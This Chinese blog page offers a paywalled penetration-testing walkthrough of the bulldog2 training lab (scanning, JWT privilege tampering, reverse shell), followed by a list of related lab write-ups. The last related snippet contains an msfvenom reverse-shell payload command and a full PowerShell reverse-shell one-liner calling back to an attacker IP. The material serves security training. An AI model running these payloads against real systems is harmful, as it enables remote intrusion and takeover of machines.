靶机bulldog2练习:通过反弹shell进行提权

最新推荐文章于 2023-02-20 19:11:08 发布
原创 最新推荐文章于 2023-02-20 19:11:08 发布 · 1k 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#靶机bulldog练习 #利用反弹shell提权

本文详细介绍了在靶机bulldog2中通过反弹shell进行提权的过程。首先,使用nmap进行扫描发现目标主机开放了80端口,运行nginx服务。接着,尝试利用HTTP方法探测,发现不支持PUT,随后搜索并利用nginx漏洞进行注册,通过POST提交JSON数据注册新用户。成功注册后,通过水平和垂直越权,修改JWT中的`auth_level`达到更高权限。最终,利用错误密码触发反弹shell,并通过python一句话木马获取标准shell,成功提权。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

环境:kali机一台:192.168.109.142、靶机bulldog2一台:192,168.109.149

扫描网段:发现有主机IP地址为192.168.109.149,存活

扫描发现目标的目标主机信息如下:

  • -sV 版本探测
  • -sT TCP connect()扫描
  • -sC :脚本扫描通过选项被激活
  • -p- :从端口1扫描到65535
  • -T5个级别:paranoid (0)、sneaky (1)、polite (2)、normal(3) aggressive (4)insane (5)

发现80端口、nginx服务

验证http中开启的-methods 方法

nmap --script http-methods --script-args http-methods.url-path="/test" 192.168.109.149

探测http服务发现不支持put方法,无法进行上传操作。

搜索nginx服务漏洞

在最后一行发现远程溢出,直接用火狐访问页面找交互点、找登录

最低0.47元/天 解锁文章

200万优质内容无限畅学
靶机Bulldog练习:通过python脚本远程连接弹出shell进行
7Riven's blog
12-09 979
1.主机发现 方法一:netdiscover命令 netdiscover -i eth0 -r 192.168.109.0/24 主动,不扫描本机IP地址 netdiscover -p 被动,不容易被发现,只能扫到有交互的 -i 指定网卡 -r 指定网段 方法二:nmap命...
靶机zico2练习:数据库插入反弹语句获取shell,脏牛,清除痕迹,留后门
7Riven's blog
01-29 1009
1.主机发现 2.端口扫描 3.目录扫描 4.端口访问 尝试一下,含有文件包含漏洞 5.访问扫描出来的目录 发现登录端口,需要输入密码 尝试弱口令admin登录成功 信息查询,发现用户名、密码 md5解密试试,root用户密码为:34kroot34 zico用户密码为:zico2215@ 由于存在ssh服务端口,尝试连接 ...
cmd反弹shell
10-24
cmd反弹shell
059 反弹shell
鸡蛋炒鸡蛋
04-07 7149
文章目录一:升概述二:windows2.1: 启动项2.2:系统漏洞2.2.1:笔记2.2.2:实验 一:升概述 水平升(越) 同级账户间切换身份,比如有ABC三个用户,AB是普通用户只能自己发帖,然后只能删除自己的贴,C是管理员能删除所有人的帖子,然后突然A可以删除B的帖子了,这就是越。 垂直升 普通用户获得了管理员的限 web用户直接成管理员用户     二:windows: 基于webshell,也就是说目标机器存在大马文
LINUX下使用NC反弹CMDSHELL
weixin_33890526的博客
03-25 862
很多时候linux拿到shell了,然后在菜刀或Shell里执行简单命令不允许!说明限很死或者被管理禁止了!这里我已NC将SHELL反弹回本地!先看下linux内核 2.6.18-194.11.3.el5 内核 ,这个好CentOS release 5.5的系统! 找个外网IP 监听12666,当然12666也可以改。我这里用NC监听nc -l -n -v -p 12666 然后...
Vulnhub靶场渗透测试系列bulldog(命令注入和sudo)
qq_45722813的博客
11-15 2788
Vulnhub靶场渗透测试系列-bulldog 靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/ 下载将其导入VMware,设置网络模式为NAT模式,开启靶机虚拟机 在kali攻击机使用命令nmap -Pn 192.168.172.1/24来获取靶机的IP地址 这里如果实在扫不出来靶机IP地址的话参考这篇文章来进行设置 https://blog.csdn.net/qq_45722813/article/details/121324686 得到靶机IP地
反弹shell
一纸荒芜的博客
08-01 2785
网安面试常见问题
靶机SickOs1.2练习:上传马文件菜刀连接/反弹shell,进行本地
7Riven's blog
01-13 1515
1.主机发现 2.信息扫描 指纹信息 3.端口访问 该页面未发现有效信息 尝试ssh弱口令连接,密码为root,直接成功! 4.目录扫描 未发现有效路径 有一个test目录,访问看看 点击文件,未发现有用信息 方法一:可以尝试抓包,修改option为put,上传马文件,菜刀连接getshell 上传成功! 菜刀连接 ...
靶机-Acid练习:命令注入php反弹shell,使用sudo
7Riven's blog
01-01 930
靶机下载地址:https://download.vulnhub.com/acid/Acid.rar 1.主机发现 2.端口信息扫描 3.访问该端口 查看源码,未发现有效信息 4.尝试扫描一下web目录:打开kali自带的DirBuster或者御剑 或者 依次访问看看 是一个数据库文件下载 下载后打开看看,乱码未能解析 访问Challenge目...
Linux通过反弹Shell实验
qq_59201520的博客
02-20 2745
通过反弹shell在Linux上的实验
反弹shell通过普通用户进行SUID
sGanYu
07-18 1526
如果普通账号tom需要修改密码,就要访问/etc/shadow,由于/etc/passwd文件是所有用户都可读的,如果用户的密码太简单或规律比较明显的话,一台普通的计算机就能够很容易地将它破解,因此对安全性要求较高的Linux系统都把加密后的口令字分离出来,单独存放在一个文件中,这个文件是/etc/shadow文件,有超级用户才拥有该文件读限,但是该文件只有root能访问。当tom需要修改密码,passwd程序的所有者为root,tom用户执行passwd程序的过程中会暂时获得root限。...
反弹shelllinux,【我i原创】Metasploit反弹shell + 嗅探 + 域
weixin_42498641的博客
05-13 341
[size=13.3333px]sessions -i 1 //打开建立的第一个会话getuid //查看UIDsysinfo //查看攻击主机的系统信息run hashdump //dump目标主机的hash帐号信息,备份进行暴破ps //查看目标主机进程migrate 1576(pid) //切换自己为管理员,1576是管理员的进程IDgetuidkeyscan_start //开启健盘记录功...
靶机渗透】bulldog靶机渗透练习_strings命令使用+反弹shell方法
serendipity1130的博客
08-31 853
靶机ip无法获取问题的解决方法: 1.重启bulldog,到开机页面选择第二个Ubuntu的高级选项。 2.进入高级选项,再次选择第二个Linux内核版本的恢复模式回车。 3.选择root一行回车,进入命令行模式 4.输入 mount -o rw,remount / 5.输入 ifconfig -a (查看网卡名称) 6.输入 vim /etc/network/interfaces ,修改网卡名称成查询的结果,保存后输入reboot重启即可。 auto ens33 iface ens33 i
基于Linux操作系统的几种反弹Shell方法的总结
W小哥
03-09 1082
什么是反弹shell 所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上 为什么要反弹shell? 通常用于被控端因防火墙受限、限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正...
Linux webshell反弹cmdline
weixin_34092455的博客
01-21 377
方法一: 利用shell本身的功能(以r57shell.php为列): 1.back connect功能. 首先在本机(外网)nc监听某个端口:nc -vv -l -p 11457,然后shell中添上你本机的IP及端口,如果情况好即可获得一个cmdline. 你可以选择是perl还是c(这个很重要,很多时候换个就能成功) 2.Bind port to ...
Linux渗透之反弹Shell命令解析
热门推荐
deeplearnings的博客
08-18 1万+
前言 当我们在渗透Linux主机时,反弹一个交互的shell是非常有必要的。在搜索引擎上搜索关键字“Linux 反弹shell”,会出现一大堆相关文章,但是其内容不但雷同,而且都仅仅是告诉我们执行这个命令就可以反弹shell了,却没有一篇文章介绍这些命令究竟是如何实现反弹shell的。既然大牛们懒得科普,那我就只好自己动手了。本文就来探讨一下相关命令实现的原理。 B
三分钟让你完全理解反弹shell限的原理
hyjcking的博客
12-03 753
反弹shell作为常见的攻击手段,攻击者可以利用应用程序漏洞,建立反向shell连接,从而获取对系统的交互式访问限。一旦获得了对系统的访问限,攻击者可以进行侦听,横向移动及尝试升特,达到窃取系统或数据库中敏感数据的目的。反弹shell作为外网渗透的最后一步、内网渗透的第一步,其对服务器安全乃至内网安全的危害不言而喻。「认识反弹shell」众所周知,正常的攻击方式是攻击者攻击一台目标机器,会在目标机器上打开一个端口,然后去连接该目标机器,这种连接方式我们称之为正向连接。而多数情况下,被控端位于防火墙之
靶机记录(四):Bulldog2
weixin_47306547的博客
10-29 461
主机发现 端口扫描 Web渗透 目录扫描 漏洞挖掘 一般情况下,如果没有发现什么可利用的目录,就可以尝试查看js页面,一般会有突破口 JWT(Json Web Token)的声明,一般用于身份供者和服务供者间,来传递被认证的用户身份信息,以便从资源服务器获取资源,也可以增加一些额外的其他业务逻辑所必须的声明信息,该token也可直接被用于认证或被加密; JWT加解密网址:https://jwt.io/ 注册时格式错...
【VulnHub靶机渗透】一:BullDog2
野原新之助
03-20 1251
在网上大佬WriteUp的帮助下,成功完成了第一次完整的靶机渗透测试,熟悉了整体步骤,希望之后的靶机能越来越多的自己独立完成(大佬NB!),现将详细过程做如下整理。 简介 ...
windows靶机反弹shell
最新发布
02-19
### Windows 靶机反弹 Shell方法 #### 一、使用 Metasploit 实现反弹 Shell 为了创建一个可以用于反弹 Shell 的 payload 文件,可以通过 `msfvenom` 工具来完成。对于 Windows 系统而言,假设目标机器支持 x64 架构,则可采用如下命令生成 HTA 格式的 Payload: ```bash msfvenom -p windows/x64/shell_reverse_tcp LHOST=<vps_ip> LPORT=9090 -f hta-psh -o 1.hta ``` 此操作将会把生成的恶意文件保存为名为 "1.hta" 的文件[^3]。 当受害者访问这个 .hta 文件时,它会在受害者的计算机上执行并尝试连接到指定 IP 地址和端口上的监听器,从而建立反向 Shell 连接。 #### 二、通过 Netcat (nc) 创建简单 TCP 反弹 Shell 另一种较为基础的方式是在攻击者控制下的设备上启动监听服务,并让目标主机发送回连接请求。具体做法如下所示: - 攻击方设置好监听状态:`nc -lvp 4444` - 被控端执行相应指令以发起连接:`powershell.exe -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.41.142',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"` 上述 PowerShell 命令能够供更稳定的交互环境给攻击者[^2]。 #### 三、关于过程中的注意事项 一旦获得了初始级别的 Shell 访问限之后,下一步通常是试图升至更高层次的操作系统特级别。然而,在实际操作中需要注意以下几个方面的问题: - **网络配置**:确认攻击机与靶机处于相同网段内; - **架构匹配度**:确保所使用的 exploit 或 payload 符合目标系统的 CPU 类型(即 32-bit vs 64-bit),这可通过运行 `systeminfo` 来获取信息; - **持续性维护会话**:在整个渗透测试期间维持稳定的目标系统在线状况; - **漏洞适用范围**:考虑到某些安全更新可能已经修复了特定类型的弱点,因此应当针对未修补版本实施攻击策略; 最后一步是验证是否成功升了限等级,通常情况下可以借助于调用 `whoami` 或类似的内置工具来进行检查。如果显示的结果表明当前是以管理员身份登录的话,则说明操作顺利完成[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值